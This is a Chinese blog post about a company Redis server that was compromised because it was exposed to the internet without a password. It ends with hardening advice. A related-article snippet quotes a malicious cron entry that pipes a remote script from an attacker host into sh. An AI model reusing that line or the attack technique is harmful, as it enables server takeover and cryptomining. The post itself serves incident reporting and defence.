记redis被攻击笔记

最新推荐文章于 2024-05-15 11:40:15 发布
最新推荐文章于 2024-05-15 11:40:15 发布
阅读量3.5k 收藏 1
点赞数
分类专栏: redis 文章标签: redis 密码 服务器 数据

公司redis集群不断丢失数据,莫名进程不断涌起。

经过几天排查,锁定redis被攻击。

很多使用者都是把redis下载到服务器直接运行使用,无ACL,无密码,root运行,且绑定在0.0.0.0:6379,暴露在公网。攻击者在未授权访问 Redis 的情况下通过redis的机制,可以将自己的公钥或者其他恶意程序写入目标服务器中,从而可以直接控制目标服务器。 

下面还原攻击情况:

寻找无验证的redis服务:

这里写图片描述
这里写图片描述
这里写图片描述
 

 容易遭受攻击的环境是用户自建的运行了 Redis 服务的 Linux 主机,并在公网上开放了 6379 的 Redis 端口。目前云服务供应商青云已经提供相应解决方案:

  1:以非 root 权限启动 Redis
  2:增加 Redis 密码验证
  3:禁止公网开放 Redis 端口, 如可在防火墙上禁用 6379 Redis 端口
  4:检查 authorized_keys 是否非法
  

  比较直接有效的修补加固建议是从环境安全角度进行无需外网访问的可以绑定本地回环,同时需要对外的增加ACL进行网络访问控制。另外还可以借用stunnel等工具完成数据加密传输。给redis设定密码、创建单独的nologin系统账号给redis服务使用、禁用特定命令等有效措施也可以亡羊补牢。

UpUpUpUpUpUpUp
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
血的教训---入侵redis并远程控制你的机器场景复现
guijianchouxyz的博客
10-26 6887
不怕服务安装部署,就怕上任运维瞎部署防不胜防,全是泪,全是血
redis受到攻击
weixin_40083227的博客
05-03 418
今天被挖矿软件不小心植入脚本了,导致云服务器100%的CPU占用,被迫当肉鸡。原因是redis的默认端口没有改,也没有密码,就被攻击。 解决方法是 sudo kill -9 10053 && sudo userdel redis 必须要同时执行,这个脚本会自动唤醒,删除redis用户后,找到异常的脚本文件删除掉。然后卸载redis,sudo apt remove redis ...
服务器Redis数据库被攻击实录+总结
最新发布
青衫客36的博客
05-15 1031
通过以上步骤,可以详细了解攻击过程,并采取有效的措施防止类似攻击的发生。增强 Redis 服务器和系统的安全性是关键,确保只有受信任的用户能够访问和管理服务器。计划任务格式:计划任务的格式是一个定时器表达式后跟执行命令。这条任务每 15 分钟执行一次curl命令下载并执行远程脚本。文件路径:攻击者将 Redis 配置为将数据持久化到cron计划任务目录,如。这导致持久化的内容成为cron守护进程的一部分计划任务。持久化机制的滥用:通过 Redis 的SAVE。
Redis攻击Redis安全性)
Beyonderwei的博客
10-28 2125
文章目录一、简介二、设置密码 一、简介     默认Redis没有开启密码,因此需要我们进入后设置。如果没有设置密码就很容易会被攻击到,导致数据丢失,被植入其他内容。被攻击后写入了一些其他内容如下: 查询一下某一个键的内容为如下形式:(不是很懂,应该被植入了一些脚本文件) "\t\n*/20 * * * * curl -fsSL http://d.powerofwish.com/pm.sh | sh\n\t" 二、设置密码 常用命令: config get requirepass # 查询获
Redis攻击纪实
程序员青菜学厨记
11-08 439
1、2017年时候测试环境安装的是Redis4.0版本(或者更低,不太清了),默认安装6379端口可以远程访问,然后被黑了,被人家做为挖矿机,他们太狠了,一定要把我CPU耗尽,搞得别的程序都跑不了(这样别人不就发现了吗,不能控制CPU的占用情况吗?上周新来的同事分享Redis的原理和机制,想起2017年的时候测试环境Redis攻击,最后只能重新安装服务器,今天试验一把利用Redis漏洞进行攻击,只有理解了别人是怎么攻击的,才能更好地进行防范。注:忘截屏了,重启了Redis,那个注入的key找不到了。
Redis收到攻击怎么办
qq_45732538的博客
01-27 204
Redis防护建议(请您根据主机实际业务衡量进行防护) 1、Redis本身防护 (1)不要使用默认端口(6379) (2)增加Redis用户名和密码 (3)在Redis绑定指定IP访问(位置配置文件[redis.config]中的bind节点) 2、Linux服务器 (1)Redis服务器不要暴露在外网 (2)开启防火墙,限制IP可以访问(iptables命令) (3)用容器(如Docker等)管理起服务器,这样中病毒后排查不出原因需要重新装环境的时候影响小并且可以快速恢复 ...
一次Redis攻击事件
Dxx_23的博客
04-02 1020
redis版本为:7.2.4。
【实战录】服务器遭到攻击全过程(Redis漏洞)
qq_41997592的博客
02-13 3426
第一次面对服务器攻击全过程,由被动到主动!!
redis防止黑客恶意攻击的简单办法
qq_36779138的博客
12-31 1397
1.在redis中放入有用户标识的key,每次用户操作时都会根据用户标识的key去匹配一下,匹配上就能操作,匹配不上就拒绝。 下面的代码是商品秒杀场景,根据用户id和商品id去生成一个标识,然后放入redis缓存中。 @Override public String getMd5(Integer id,Integer userid){ //检验用户的合法性 User user = userMapper.findById(userid); if(user
redis安全攻防(专注渗透视角)
LainWith的博客
04-11 2927
数据库作为业务平台信息技术的核心和基础,承载着越来越多的关键数据,渐渐成为单位公共安全中最具有战略性的资产,数据库的安全稳定运行也直接决定着业务系统能否正常使用。并且平台的数据库中往往储存着等极其重要和敏感的信息。这些信息一旦被篡改或者泄露,轻则造成企业经济损失,重则影响企业形象,甚至行业、社会安全。可见,数据库安全至关重要。所以对数据库的保护是一项必须的,关键的,重要的工作任务。
一次阿里云服务器Redis被【挖矿病毒crypto和pnscan】攻击的case,附带解决方案
热门推荐
董哥的黑板报
05-15 1万+
一、事情缘由 前段时间给大家录制《玩转Docker》教学视频,链接请参阅https://www.bilibili.com/video/BV1BK4y1A78M,为了更好的演示,就在阿里云搞了一个云服务器,自己本地连接。 云服务器到手之后,为了可以让自己本地可以连接到阿里云服务器上就做了如下操作: 开放了ssh(port:22)端口:为了远程连接使用。 开放了剩余的其他所有端口:录制教学视频时启动了相关容器,容器的一些固定端口6379等映射到了宿主机的随机端口上,为了能从公网访问到容器的内容,就开放
关于2022年10月12日发现服务器Redis攻击报告
weixin_44547333的博客
10-13 480
录一次自己的服务器redis攻击,以及排查过程和解决
redis 安全漏洞导致服务器攻击
Golden_lion的博客
03-01 3883
近日发现redis数据无故被清,恢复后连续几次还是被清,由于经验不足,一直认为是自己配置有误。经过多天查找,才发现2015年11月份爆发了redis安全漏洞攻击事件,一一印证了下,全部中招。 特点: 1.redis缓存被清0;而且每天会执行一次; 2./root/.ssh/ 下多了几个文件。dump.rdb, foo.txt, authorized_keys里多了莫名
拯救redis攻击后的服务器
CheerTan is here
02-05 2511
现象描述 最直观的就是服务器CPU居高不下,服务器里的nginx服务不断被关停,redis6379端口不断被各种服务器连接,而且每5s中就切换一次连接任务,后来查看定时任务里赫然出现一个定时脚本,每30分钟便执行一次,定时任务无法修改,病毒文件无法删除,详情见下图: 原因分析 根本原因在于开启了redis并选用了默认端口并用root权限启动,最致命的就是没有设密码暴露在公网,当时为了调试只开放了5小时左右,服务器就已中招。 病毒脚本分析 #!/bin/sh #暂时关闭SELINUX,以方便后续永久关
[网络安全-1]Redis远程攻击漏洞分析与防护
shgh_2004的专栏
05-31 847
Redis远程攻击漏洞分析与防护 Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis数据攻击者在未授权访问 Redis 的情况下可以利用 Redis 的相关方法,可以成功在 Redis 服务器上写入公钥,进而可以使用对应私钥...
一次redis服务器攻击的体验
xyffly的博客
03-13 1445
前几天查看了自己的云服务器,发现被异常登录了,阿里云也发来了警告,赶紧登上去看了一下。        查看了一下检查/root/.ssh/下有没有秘钥文件,发现果然有一个公钥文件。                  先把他删除。1)禁止使用 root 权限启动 redis 服务2)对 redis 访问启用复杂密码认证,并且添加 IP 访问限制3)尽可能不对公网直接开放 SSH 服务4)并且关掉nt...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值